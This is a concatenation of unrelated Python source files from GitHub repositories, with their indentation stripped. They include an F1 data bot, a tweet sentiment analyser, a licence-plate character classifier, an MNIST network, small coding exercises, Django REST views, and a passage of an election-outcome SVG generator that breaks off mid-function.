dt_format_o = "%Y %Y-%m-%d %H:%M:%S"
import fastf1 as ff1
import os
import drivers
import requests
try:
ff1.Cache.enable_cache("/ff1cache")
except NotADirectoryError:
os.makedirs("/ff1cache", exist_ok=True)
drivers_table = drivers.drivers_table()
teams = ["Red Bull", "Ferrari", "Mercedes", "McLaren", "Alpine", "Alfa Romeo", "AlphaTauri", "Haas", "Aston Martin",
"Williams"]
schedule = [datetime(2023, 3, 4, 20, 29),
datetime(2023, 3, 18, 22, 29),
datetime(2023, 4, 1, 10, 29),
datetime(2023, 4, 29, 18, 59),
datetime(2023, 5, 7, 1, 29),
datetime(2023, 5, 27, 19, 29),
datetime(2023, 6, 3, 19, 29),
datetime(2023, 6, 18, 1, 29),
datetime(2023, 7, 1, 19, 59),
datetime(2023, 7, 8, 19, 29),
datetime(2023, 7, 22, 19, 29),
datetime(2023, 7, 29, 19, 59),
datetime(2023, 8, 26, 18, 29),
datetime(2023, 9, 2, 19, 29),
datetime(2023, 9, 16, 18, 29),
datetime(2023, 9, 23, 11, 29),
datetime(2023, 10, 7, 19, 59),
datetime(2023, 10, 22, 3, 29),
datetime(2023, 10, 29, 2, 29),
datetime(2023, 11, 3, 23, 59),
datetime(2023, 11, 18, 13, 29),
datetime(2023, 11, 25, 19, 29)]
def returnNextEvent():
next_event: ff1.events.EventSchedule = ff1.get_events_remaining().head(1)
# logging.info(next_event.to_string())
ne_round = next_event.iat[0, 0]
ne_location = next_event.iat[0, 1]
if ne_location == 'United States':
ne_location = 'USA'
ne_date = next_event.iat[0, 4]
ne_name = next_event.iat[0, 5]
ne_type = next_event.iat[0, 6]
ne_session_data = {}
for i in range(0, 5, 2):
ne_session_data[next_event.iat[0, 7 + i]] = next_event.iat[0, 7 + i + 1]
return {'round': ne_round,
'loc': ne_location,
'date': ne_date,
'name': ne_name,
'type': ne_type,
'session': ne_session_data
}
def returnCurrentRoundNum():
# next_event: ff1.events.EventSchedule = ff1.get_events_remaining().head(1)
# ne_round = next_event.iat[0, 0]
# print(next_event)
for i, date in enumerate(schedule):
if datetime.now() < date:
return i + 1
return 24
def returnEvent(identifier):
se: ff1.events.Event = ff1.get_event(datetime.now().year, identifier)
# print(se)
ser = se.iat[0]
sel = se.iat[1]
sed = se.iat[4]
sen = se.iat[5]
sety = se.iat[6]
if ser < returnCurrentRoundNum() and drivers_table.results.get(str(ser)) is not None:
return {'round': ser,
'loc': sel,
'date': sed,
'name': sen,
'type': sety,
'results': drivers_table.results[str(ser)]
}
else:
return {'round': ser,
'loc': sel,
'date': sed,
'name': sen,
'type': sety,
}
def returnRoundsInYear(year=datetime.now().year):
cal = ff1.events.get_event_schedule(year=year, include_testing=False).tail(1)
return cal.iat[0, 0]
def returnGPQuali(pgp):
if drivers_table.quali_results.get(str(pgp)) is not None:
return drivers_table.quali_results.get(str(pgp))
else:
if returnEvent(pgp)["type"] == "sprint":
keyword = "sprint"
else:
keyword = "qualifying"
url = f"https://ergast.com/api/f1/{datetime.now().year}/{pgp}/{keyword}.json"
response = requests.get(url)
data = response.json()["MRData"]["RaceTable"]["Races"]
if len(data) == 0:
return None
else:
drivers_table.quali_results[str(pgp)] = [dr["Driver"]["code"] for dr in data[0]["QualifyingResults"]]
return drivers_table.quali_results[str(pgp)]
# return ["LEC", "VER", "HAM", "PER", "RUS", "NOR", "ALO", "OCO", "GAS", "ZHO"]
def returnRaceResults(r):
if drivers_table.results.get(str(r)) is not None:
return drivers_table.results.get(str(r))
else:
url = f"https://ergast.com/api/f1/{datetime.now().year}/{r}/results.json"
response = requests.get(url)
data = response.json()["MRData"]["RaceTable"]["Races"]
if len(data) == 0:
return None
else:
drivers_table.results[str(r)] = [dr["Driver"]["code"] for dr in data[0]["Results"]]
return drivers_table.results[str(r)]
def verifyTeam(t):
return t if t in teams else 'NaN'
# print(returnCurrentRoundNum())
| nERD8932/LVSF1Bot | scripts/f1module.py | f1module.py | py | 4,985 | python | en | code | 1 | github-code | 36 |
70853975785 | # -*- coding: utf-8 -*-
from __future__ import print_function
from nltk.stem.porter import PorterStemmer
from textblob import TextBlob
from wordcloud import WordCloud
import nltk
import json
import matplotlib.pyplot as plt
import os
import string
from textblob.sentiments import NaiveBayesAnalyzer
ps = PorterStemmer()
tweetDict = {}
def main(name,location):
directory = "Corpus Data"
count = 0
if location == "":
filename = 'tweet_stream_{}.json'.format(name)
fileCorpus = 'tweet_stream_{}.txt'.format(name)
else:
filename = 'tweet_stream_{}_{}.json'.format(name,location)
fileCorpus = 'tweet_stream_{}_{}.txt'.format(name,location)
print(filename)
#Read dataset containing tweets
with open(filename) as json_file:
tweets = json.load(json_file)
with open(directory + '/' + fileCorpus, 'w') as f:
for tweet in tweets:
#Removal of special characters
encoded_tweet=tweet[1].encode('utf-8')
unicode_text = encoded_tweet.decode('unicode_escape').encode('ascii','ignore')
punct=string.punctuation
table_p=string.maketrans(punct,len(punct)*" ")
text=unicode_text.translate(table_p)
tweetDict[count] = [tweet[0],text]
if not os.path.exists(directory):
os.makedirs(directory)
f.write(tweet[1].encode('utf-8'))
f.write('\n')
count += 1
sub = []
pol = []
cnt = 1
for key,value in tweetDict.iteritems():
#if value[0].strip() == dateVal.strip():
#Call to removal_stop_words
text_without_stopwords = remove_stop_words(value[1])
#TextBlob using NaiveBayes
text = TextBlob(text_without_stopwords,analyzer = NaiveBayesAnalyzer())
pol.append(text.sentiment.p_pos)
sub.append(text.sentiment.p_neg)
print(cnt)
cnt += 1
#TextBlob without NaiveBayes
# text = TextBlob(value[1])
# pol.append(text.sentiment.polarity)
# sub.append(text.sentiment.subjectivity)
word_cloud()
resultPolarity = sum(pol)/len(pol)
resultSubjectivity = sum(sub)/len(sub)
print(resultPolarity,resultSubjectivity)
return resultPolarity,resultSubjectivity
#Removal of stopwords
def remove_stop_words(text):
keyword = ' '
stop = set(nltk.corpus.stopwords.words('english'))
for i in text.lower().split():
if i not in stop:
#Stemming
stemmedVar = ps.stem(i)
keyword += ' ' + stemmedVar
return keyword
#Word Cloud
def word_cloud():
keywords_list = ''
for key,value in tweetDict.iteritems():
keyword = remove_stop_words(value[1])
keywords_list += ' ' + keyword
wordcloud = WordCloud().generate(keywords_list)
plt.imshow(wordcloud)
plt.axis("off")
wordcloud = WordCloud(max_font_size=40).generate(keywords_list)
plt.figure()
plt.imshow(wordcloud)
plt.axis("off")
plt.show()
| dhanashriOstwal/electionSentimentAnalysis | Python Scripts/sentimentAnalysis.py | sentimentAnalysis.py | py | 3,158 | python | en | code | 0 | github-code | 36 |
22355103302 | # coding: utf-8
import os
import random
import time
import cv2
import numpy as np
import torch
from torch import nn, optim
from tqdm import tqdm
import matplotlib.pyplot as plt
import modules
class Classifier:
chinese_characters = ['云', '京', '冀', '吉', '宁', '川', '新', '晋', '桂', '沪',
'津', '浙', '渝', '湘', '琼', '甘', '皖', '粤', '苏', '蒙',
'藏', '豫', '贵', '赣', '辽', '鄂', '闽', '陕', '青', '鲁',
'黑']
other_characters = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K',
'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
'W', 'X', 'Y', 'Z']
def __init__(self, load_path=None, dataset_path=None, train_proportion=0.8, save_path=None, is_chinese=True):
if torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
if load_path:
self.cnn = torch.load(load_path)
elif is_chinese:
self.cnn = modules.MyCNN(len(self.chinese_characters))
else:
self.cnn = modules.MyCNN(len(self.other_characters))
self.characters = self.chinese_characters if is_chinese else self.other_characters
self.character_dict = dict([(c, i) for i, c in enumerate(self.characters)])
self.train_images, self.train_labels = ([], []) if not dataset_path else self.read_dataset(dataset_path)
self.eval_images, self.eval_labels = ([], [])
self.train_proportion = train_proportion
self.save_path = save_path
def predict(self, images, batch_size=8, to_character=True):
"""
Predict labels.
"""
images = np.array(images, )
pred_labels = []
self.cnn.eval()
for start in range(0, len(images), batch_size):
outputs = self.cnn(torch.tensor(images[start:start + batch_size], dtype=torch.float32))
pred_labels += outputs.softmax(1).argmax(1).tolist()
return [self.characters[idx] for idx in pred_labels] if to_character else pred_labels
def train(self, num_epochs, train_batch_size=8, method='adam', lr=0.01, momentum=0, do_eval=True,
eval_batch_size=8):
"""
Train, and evaluate if specified.
"""
assert train_batch_size > 0 and eval_batch_size > 0
optimizer = self.get_optimizer(method=method, lr=lr, momentum=momentum)
train_accuracy_list = []
eval_accuracy_list = []
for epoch in range(num_epochs):
self.shuffle_dataset()
# Train
print('-' * 20 + 'Training epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
num_correct = 0
for start in tqdm(range(0, len(self.train_images), train_batch_size), desc='Training batch: '):
images = self.train_images[start:start + train_batch_size]
actual_labels = self.train_labels[start:start + train_batch_size]
# Forward
images = torch.tensor(np.array(images), dtype=torch.float32)
outputs = self.cnn(images)
# Backward
batch_labels = torch.tensor(actual_labels, dtype=torch.int64)
self.cnn.zero_grad()
loss = nn.CrossEntropyLoss()(outputs, batch_labels)
loss.backward()
optimizer.step()
# Calculate metrics
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.train_images)
print('Accuracy:', acc)
train_accuracy_list.append(acc)
self.save_cnn(str(epoch) + '.pth')
# Evaluate
if not do_eval:
continue
num_correct = 0
print('-' * 20 + 'Evaluating epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
for start in tqdm(range(0, len(self.eval_images), eval_batch_size), desc='Evaluating batch: '):
images = self.eval_images[start:start + eval_batch_size]
actual_labels = self.eval_labels[start:start + eval_batch_size]
# Forward
images = torch.tensor(images, dtype=torch.float32)
outputs = self.cnn(images)
# Get results
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.eval_images)
print('Accuracy:', acc)
eval_accuracy_list.append(acc)
plt.plot(train_accuracy_list)
plt.plot(eval_accuracy_list)
plt.legend(['train', 'eval'])
plt.show()
def get_optimizer(self, method='adam', lr=0.01, momentum=0):
if method == 'sgd':
return optim.SGD(self.cnn.parameters(), lr=lr, momentum=momentum)
elif method == 'adam':
return optim.Adam(self.cnn.parameters(), lr=lr)
else:
return None
def shuffle_dataset(self):
images = self.train_images + self.eval_images
labels = self.train_labels + self.eval_labels
seed = time.time()
random.seed(seed)
random.shuffle(images)
random.seed(seed)
random.shuffle(labels)
split_index = int(self.train_proportion * len(images))
self.train_images, self.train_labels = images[:split_index], labels[:split_index]
self.eval_images, self.eval_labels = images[split_index:], labels[split_index:]
def save_cnn(self, name):
if not self.save_path:
return None
elif not os.path.exists(self.save_path):
os.makedirs(self.save_path)
torch.save(self.cnn, os.path.join(self.save_path, name))
def read_dataset(self, path):
print('-' * 20 + 'Reading data' + '-' * 20, flush=True)
images, labels = [], []
for character in tqdm(self.characters):
current_dir = os.path.join(path, character)
for file_name in os.listdir(current_dir):
file_path = os.path.join(current_dir, file_name)
image = cv2.imdecode(np.fromfile(file_path, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
label = self.character_dict[character]
images.append(image)
labels.append(label)
return images, labels
| QQQQQby/Car-Plate-Recognition | classifier.py | classifier.py | py | 6,613 | python | en | code | 1 | github-code | 36 |
37635527190 | # You are given a map in form of a two-dimensional integer grid where 1 represents land and 0 represents water.
# Grid cells are connected horizontally/vertically (not diagonally). The grid is completely surrounded by water, and there is exactly one island (i.e., one or more connected land cells).
# The island doesn't have "lakes" (water inside that isn't connected to the water around the island). One cell is a square with side length 1. The grid is rectangular, width and height don't exceed 100. Determine the perimeter of the island.
# Example:
# Input:
# [[0,1,0,0],
# [1,1,1,0],
# [0,1,0,0],
# [1,1,0,0]]
# Output: 16
# Explanation: The perimeter is the 16 yellow stripes in the image below:
class Solution:
def islandPerimeter(self, grid: 'List[List[int]]') -> 'int':
row = len(grid)
if row==0:
return 0
col = len(grid[0])
if col==0:
return 0
dirs = [[0,1],[0,-1],[1,0],[-1,0]]
ans = 0
for r in range(row):
for c in range(col):
if grid[r][c]==1:
per = 0
for dr,dc in dirs:
nr = r+dr
nc = c+dc
if 0<=nr<row and 0<=nc<col:
if grid[nr][nc]==0:
per+=1
else:
per+=1
ans+=per
return ans
| sunnyyeti/Leetcode-solutions | 463_Island_Perimeter.py | 463_Island_Perimeter.py | py | 1,476 | python | en | code | 0 | github-code | 36 |
38285078798 | from setuptools import find_packages, setup
with open("README.txt") as f:
readme = f.read() + "\n"
with open("CHANGES.txt") as f:
readme += f.read() + "\n"
with open("HACKING.txt") as f:
readme += f.read()
setup(
name="fc.qemu",
version="1.4.1.dev0",
author="Christian Kauhaus, Christian Theune",
author_email="mail@flyingcircus.io",
url="http://github.com/flyingcircusio/fc.qemu",
description="Qemu VM management utilities",
long_description=readme,
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Programming Language :: Python :: 3.8",
],
zip_safe=False,
license="BSD",
namespace_packages=["fc"],
install_requires=[
"colorama", # ==0.3.3',
"abaez.consulate==1.1.0",
"psutil", # ==5.4.2',
"PyYaml>=5.3.1",
"requests", # ==2.11.1',
"setuptools",
"structlog>=16.1.0",
],
entry_points={
"console_scripts": [
"fc-qemu = fc.qemu.main:main",
"supervised-qemu = fc.qemu.hazmat.supervise:main",
],
},
)
| flyingcircusio/fc.qemu | setup.py | setup.py | py | 1,233 | python | en | code | 4 | github-code | 36 |
74226549222 | # Complete the function below.
def move(leftvalue, avg):
num_of_move = 0
num_of_right_value = 0
for i in range(len(avg)):
if avg[i] != leftvalue:
num_of_right_value += 1
if avg[i] == leftvalue:
num_of_move += num_of_right_value
return num_of_move
def minMoves(avg):
print(avg)
half_len = int(len(avg)/2)
left_ones = 0
right_ones = 0
for i in range(len(avg)):
if i < half_len:
if avg[i]==1:
left_ones += 1
elif i > half_len:
if avg[i]==1:
right_ones += 1
if left_ones > right_ones:
#put one on left
return move(1,avg)
else:
#put zero on left
return move(0,avg)
avg = [1, 1, 1, 1, 0,0,0,0]
print(minMoves(avg))
| iamzhanghao/AI_Projects | other/visa_coding_test/hello.py | hello.py | py | 808 | python | en | code | 2 | github-code | 36 |
16239896813 | def is_palindrome(word):
# Проверяем длину слова
if len(word) < 3:
print("Слово должно содержать как минимум 3 символа")
return False
stack = [] # Создаем пустой стек
# Заполняем стек первой половиной слова
for i in range(len(word) // 2):
stack.append(word[i])
# Определяем индекс, с которого нужно сравнивать элементы со стека
if len(word) % 2 == 0: # Если длина слова четная
start_index = len(word) // 2
else: # Если длина слова нечетная
start_index = len(word) // 2 + 1
# Сравниваем элементы со стека с оставшейся половиной слова
for i in range(start_index, len(word)):
if word[i] != stack.pop():
print("Слово не является палиндромом")
return False
print("Слово является палиндромом")
return True
# Получаем ввод от пользователя
word = input("Введите слово: ")
# Проверяем, является ли слово палиндромом
is_palindrome(word)
| Merlin0108/rep2 | lab11/1.py | 1.py | py | 1,334 | python | ru | code | 0 | github-code | 36 |
23621436946 | #!/usr/bin/env python3
""" module """
import numpy as np
def convolve(images, kernels, padding='same', stride=(1, 1)):
""" that performs a convolution on images using multiple kernels: """
w, h, m = images.shape[2], images.shape[1], images.shape[0]
kk, kw, kh = kernels.shape[3], kernels.shape[1], kernels.shape[0]
sw, sh = stride[1], stride[0]
pw, ph = 0, 0
if padding == 'same':
ph = int(((h - 1) * sh + kh - h) / 2) + 1
pw = int(((w - 1) * sw + kw - w) / 2) + 1
if isinstance(padding, tuple):
ph = padding[0]
pw = padding[1]
images = np.pad(images,
pad_width=((0, 0),
(ph, ph),
(pw, pw),
(0, 0)),
mode='constant', constant_values=0)
new_h = int(((h + 2 * ph - kh) / sh) + 1)
new_w = int(((w + 2 * pw - kw) / sw) + 1)
output = np.zeros((m, new_h, new_w, kk))
for y in range(new_h):
for x in range(new_w):
for k in range(kk):
output[:, y, x, k] = \
(kernels[:, :, :, k] *
images[:,
y * sh: y * sh + kh,
x * sw: x * sw + kw,
:]).sum(axis=(1, 2, 3))
return output
| vandeldiegoc/holbertonschool-machine_learning | math/0x04-convolutions_and_pooling/5-convolve.py | 5-convolve.py | py | 1,330 | python | en | code | 0 | github-code | 36 |
29450013209 | from ..models import Comment
from ..serializers import CommentSerializer
from rest_framework.response import Response
from rest_framework import permissions, generics
from rest_framework.authtoken.models import Token
from rest_framework.status import HTTP_403_FORBIDDEN
class CommentDetail(generics.RetrieveUpdateDestroyAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
queryset = Comment.objects.all()
serializer_class = CommentSerializer
def put(self, request, *args, **kwargs):
comment = Comment.objects.get(pk=kwargs['pk'])
## Check if the request was sent by the writer
token = request.headers['Authorization'].split()[1]
id = Token.objects.get(pk=token).user.profile
if comment.writer != id:
return Response({"You don't have permissions to perform this action."}, status=HTTP_403_FORBIDDEN)
request.data['parent_meeting'] = comment.parent_meeting.id
request.data['writer'] = comment.writer.id
return self.update(request, *args, **kwargs)
class CommentList(generics.ListCreateAPIView):
permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
queryset = Comment.objects.all()
serializer_class = CommentSerializer
def post(self, request, *args, **kwargs):
token = request.headers['Authorization'].split()[1]
profile = Token.objects.get(pk=token).user.profile
request.data['writer'] = profile.id
return self.create(request, *args, **kwargs)
| thunderlink/ThunderFish | backend/server/views/comment.py | comment.py | py | 1,520 | python | en | code | 3 | github-code | 36 |
31044290128 | import torch
from torch.autograd import Function
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import time
import numpy as np
#Force Determinism
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(0)
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
input_size = 784
hidden_size = 500
num_classes = 10
num_epochs = 1
batch_size = 50000
learning_rate = 0.00005
# MNIST dataset
train_dataset = torchvision.datasets.MNIST(root='../../data',
train=True,
transform=transforms.ToTensor(),
download=True)
test_dataset = torchvision.datasets.MNIST(root='../../data',
train=False,
transform=transforms.ToTensor())
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=False)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
rand_mask = torch.zeros(784)
rand_mask2 = torch.zeros(500)
class Linear(nn.Module):
def __init__(self, input_features, output_features, bias=True):
super(Linear, self).__init__()
self.input_features = input_features
self.output_features = output_features
# nn.Parameter is a special kind of Tensor, that will get
# automatically registered as Module's parameter once it's assigned
# as an attribute. Parameters and buffers need to be registered, or
# they won't appear in .parameters() (doesn't apply to buffers), and
# won't be converted when e.g. .cuda() is called. You can use
# .register_buffer() to register buffers.
# nn.Parameters require gradients by default.
self.weight = nn.Parameter(torch.Tensor(output_features, input_features))
if bias:
self.bias = nn.Parameter(torch.Tensor(output_features))
else:
# You should always register all possible parameters, but the
# optional ones can be None if you want.
self.register_parameter('bias', None)
# Not a very smart way to initialize weights
self.weight.data.uniform_(-0.1, 0.1)
if bias is not None:
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
# See the autograd section for explanation of what happens here.
return MyFunction.apply(input, self.weight, self.bias)
def extra_repr(self):
# (Optional)Set the extra information about this module. You can test
# it by printing an object of this class.
return 'in_features={}, out_features={}, bias={}'.format(
self.in_features, self.out_features, self.bias is not None
)
# Inherit from Function
class MyFunction(Function):
# Note that both forward and backward are @staticmethods
@staticmethod
# bias is an optional argument
def forward(ctx, input, weight, bias=None):
rand_mask = torch.zeros(input.shape)
#weight_rand_mask = torch.ones(weight.shape)
ctx.save_for_backward(input, weight, bias)
input = input + rand_mask
#weight = weight + weight_rand_mask
output = input.mm(weight.t())
rand_mask = rand_mask.mm(weight.t())
output = output - rand_mask #- weight_rand_mask
if bias is not None:
#bias_rand_mask = torch.ones(output.shape)
#bias = bias + bias_rand_mask
output += bias.unsqueeze(0).expand_as(output)
#output = output - bias_rand_mask
#print("Forward Output: ")
#print(output)
#time.sleep(5)
return output
# This function has only a single output, so it gets only one gradient
@staticmethod
def backward(ctx, grad_output):
# This is a pattern that is very convenient - at the top of backward
# unpack saved_tensors and initialize all gradients w.r.t. inputs to
# None. Thanks to the fact that additional trailing Nones are
# ignored, the return statement is simple even when the function has
# optional inputs.
input, weight, bias = ctx.saved_tensors
grad_input = grad_weight = grad_bias = None
# These needs_input_grad checks are optional and there only to
# improve efficiency. If you want to make your code simpler, you can
# skip them. Returning gradients for inputs that don't require it is
# not an error.
if ctx.needs_input_grad[0]:
grad_input = grad_output.mm(weight)
if ctx.needs_input_grad[1]:
grad_weight = grad_output.t().mm(input)
if bias is not None and ctx.needs_input_grad[2]:
grad_bias = grad_output.sum(0)
#print("Grad_input: ")
#print(grad_input)
#time.sleep(5)
return grad_input, grad_weight, grad_bias
# Fully connected neural network with one hidden layer
class NeuralNet(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(NeuralNet, self).__init__()
self.fc1 = Linear(input_size, hidden_size)
self.tanh = nn.Tanh()
self.fc2 = Linear(hidden_size, hidden_size)
self.tanh = nn.Tanh()
self.fc3 = Linear(hidden_size, hidden_size)
self.tanh = nn.Tanh()
self.fc4 = Linear(hidden_size, hidden_size)
self.tanh = nn.Tanh()
self.fc5 = Linear(hidden_size, num_classes)
def forward(self, x):
out = self.fc1(x)
out = self.tanh(out)
out = self.fc2(out)
out = self.tanh(out)
out = self.fc3(out)
out = self.tanh(out)
out = self.fc4(out)
out = self.tanh(out)
out = self.fc5(out)
return out
model = NeuralNet(input_size, hidden_size, num_classes).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, dampening=0, weight_decay=0, nesterov=False)
# Train the model
total_step = len(train_loader)
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
# Move tensors to the configured device
images = images.reshape(-1, 28*28).to(device)
labels = labels.to(device)
#rand_mask = torch.ones(784)
#rand_mask2 = torch.ones(500)
#for k in images:
# k = torch.add(k, rand_mask)
outputs = model(images)
loss = criterion(outputs, labels)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# Test the model
# In test phase, we don't need to compute gradients (for memory efficiency)
with torch.no_grad():
correct = 0
total = 0
for images, labels in test_loader:
images = images.reshape(-1, 28*28).to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: {} %'.format(100 * correct / total))
# Save the model checkpoint
torch.save(model.state_dict(), 'model.ckpt')
| RyanKarl/SGX_NN_Training_and_Inference | examples/mnist/test_main.py | test_main.py | py | 7,871 | python | en | code | 0 | github-code | 36 |
11168036307 | #!python3
"""
Construct a mouseoverable SVG of three-party-preferred outcomes.
We'll call the three parties "blue" (x-axis), "green" (y-axis) and "red" (with R + G + B == 1).
The primary methods that you'll want to call are `get_args` and `construct_svg`.
"""
from typing import Tuple
import sys
import math
from enum import Enum
import argparse
DEFAULT_CSS = """
text {font-family: sans-serif; font-size: 10px; fill: #222;}
text.label {filter: url(#keylineEffect); font-weight: bold}
/* dot, red, green, blue, tie*/
.d {opacity:0.6;}
.d:hover {opacity:1;}
.r {fill: #d04}
.g {fill: #0a2}
.b {fill: #08e}
.t {fill: #888}
/* point of interest */
.poi {stroke:#000; fill-opacity:0.4; stroke-width: 0.3%}
.line {stroke: #222; stroke-width: 0.5%; fill:none; stroke-linecap:round;}
#triangle {fill: #222}
.arrow {fill:none; stroke:#111; stroke-width:0.5%; stroke-dasharray:4 2; stroke-dashoffset:0;}
.bg {fill: #fff}
"""
class Party(Enum):
RED = ("Labor", "r")
GREEN = ("Greens", "g")
BLUE = ("Coalition", "b")
# NOTE: throughout this file we'll use a variable called `A` to store our general state
# This replaces the original and pervasive use of globals.
# Default values are set in `get_args`
def p2c(blue_pct: float, green_pct: float, A: argparse.Namespace) -> Tuple[float, float]:
'''Percentages to Coordinates'''
# trying to account for being out-of-frame here was worse than not doing it
# additional context is needed and hence now line() exists
x = ((blue_pct - A.start) / (A.stop - A.start)) * \
A.inner_width + A.offset * A.scale
y = A.inner_width * (1 - ((green_pct - A.start) /
(A.stop - A.start))) + A.scale
return (x, y)
def calculate_winner(red_pct: float, green_pct: float, blue_pct: float, A: argparse.Namespace) -> Tuple[Party, float]:
'''Given 3PP percentages, calculate the winner and their 2CP result.
Ties for third are resolved where the winner is the same either way,
with the tighter 2CP result reported.'''
def eq(x, y):
"""Equal, to a certain tolerance"""
# sufficiently close for our purposes
return math.isclose(x, y, abs_tol=A.step/10)
def lt(x, y):
"""Strictly less than, beyond a certain tolerance"""
return (x < y) and not eq(x, y)
def gt(x, y):
"""Strictly greater than, beyond a certain tolerance"""
return lt(y, x)
# need to figure out who came third, then who won
if lt(red_pct, green_pct) and lt(red_pct, blue_pct):
# Red came third
tcp = green_pct + (A.red_to_green * red_pct)
if gt(tcp, 0.5):
return (Party.GREEN, tcp)
elif gt(1.0 - tcp, 0.5):
return (Party.BLUE, 1.0 - tcp)
if lt(green_pct, red_pct) and lt(green_pct, blue_pct):
# Green came third
tcp = red_pct + (A.green_to_red * green_pct)
if gt(tcp, 0.5):
return (Party.RED, tcp)
elif gt(1.0 - tcp, 0.5):
return (Party.BLUE, 1.0 - tcp)
if lt(blue_pct, green_pct) and lt(blue_pct, red_pct):
# Blue came third
tcp = red_pct + (A.blue_to_red * blue_pct)
if gt(tcp, 0.5):
return (Party.RED, tcp)
elif gt(1.0 - tcp, 0.5):
return (Party.GREEN, 1.0 - tcp)
# print("likely tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
# resolve some ties for third
# if the leading party would win EITHER way, report their win and tightest margin
# else, return nothing (interpreted as a tie)
if eq(green_pct, blue_pct) and lt(green_pct, red_pct):
# Red leading
gex = green_pct * A.green_to_red
bex = blue_pct * A.blue_to_red
if red_pct + gex > 0.5 and red_pct + bex > 0.5:
return (Party.RED, red_pct + min(gex, bex))
if eq(red_pct, blue_pct) and lt(red_pct, green_pct):
# Green leading
rex = red_pct * A.red_to_green
bex = blue_pct * A.blue_to_green
if green_pct + rex > 0.5 and green_pct + bex > 0.5:
return (Party.GREEN, green_pct + min(rex, bex))
if eq(green_pct, red_pct) and lt(green_pct, blue_pct):
# Blue leading
gex = green_pct * A.green_to_blue
rex = red_pct * A.red_to_blue
if blue_pct + gex > 0.5 and blue_pct + rex > 0.5:
return (Party.BLUE, blue_pct + min(gex, rex))
# print("actual tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
def construct_dot(blue_pct: float, green_pct: float, A: argparse.Namespace) -> str:
'''Given green and blue percentages, return an SVG fragment corresponding to a dot at the appropriate position.'''
red_pct = 1.0 - (green_pct + blue_pct)
(x, y) = p2c(blue_pct, green_pct, A)
tooltip_3cp = f"{Party.GREEN.value[0]}: {green_pct:.1%}, {Party.RED.value[0]}: {red_pct:.1%}, {Party.BLUE.value[0]}: {blue_pct:.1%}."
try:
(winner, margin) = calculate_winner(red_pct, green_pct, blue_pct, A)
tooltip = f"{tooltip_3cp} Winner: {(winner.value)[0]} {margin:.1%}"
return f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="{(winner.value)[1]} d"><title>{tooltip}</title></circle>'.replace(".0%", "%")
except TypeError: # raised on a tie
tooltip = f"{tooltip_3cp} Winner: TIE"
return f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="t d"><title>{tooltip}</title></circle>'.replace(".0%", "%")
def frange(start, stop=None, step=None) -> float:
'''Floating-point range. [start = 0.0], stop, [step = 1.0]'''
start = float(start)
if not stop: # switcheroo
stop = start
start = 0.0
if not step:
step = 1.0
count = 0.0
while True:
t = start + count * step
if stop > 0.0 and t >= stop:
break
elif stop < 0.0 and t <= stop:
break
yield t
count += 1.0
def clamp_val(val: float, lo: float, hi: float) -> float:
"""Constrain val to be between hi and lo"""
return max(min(val, hi), lo)
def clamp(val: float, A: argparse.Namespace) -> float:
"""Constrain val to be within A.start and A.stop"""
return clamp_val(val, A.start, A.stop)
def line(x0: float, y0: float, x1: float, y1: float, A: argparse.Namespace) -> str:
"""Takes two points (percentage-space) and returns the appropriate path fragment, ensuring that they're all in-bounds."""
# we COULD have just used <clipPath> but this is even cleaner in the SVG
# general principle: there'll be a gradient.
# if anything is off the edge, we can replace with appropriate point on the edge
xa = clamp(x0, A)
ya = clamp(y0, A)
xb = clamp(x1, A)
yb = clamp(y1, A)
if math.isclose(x0, x1):
# special case: vertical line
# we can clamp without fear
pass
elif math.isclose(y0, y1):
# horizontal line
pass
elif (x0 <= A.start and x1 <= A.start) or (y0 <= A.start and y1 <= A.start) or \
(x0 >= A.stop and x1 >= A.stop) or (y0 >= A.stop and y1 >= A.stop):
# whole of line would be off-viewport
return ""
else:
# get the line equation...
m = (y1 - y0)/(x1 - x0) # gradient
c = y0 - m * x0 # y-offset
if x0 < A.start:
ya = m * A.start + c
elif x0 > A.stop:
ya = m * A.stop + c
if x1 < A.start:
yb = m * A.start + c
elif x0 > A.stop:
yb = m * A.stop + c
if y0 < A.start:
xa = (A.start - c) / m
elif y0 > A.stop:
xa = (A.stop - c) / m
if y1 < A.start:
xb = (A.start - c) / m
elif y1 > A.stop:
xb = (A.stop - c) / m
# Finally, convert to coordinates and return
(xp, yp) = p2c(xa, ya, A)
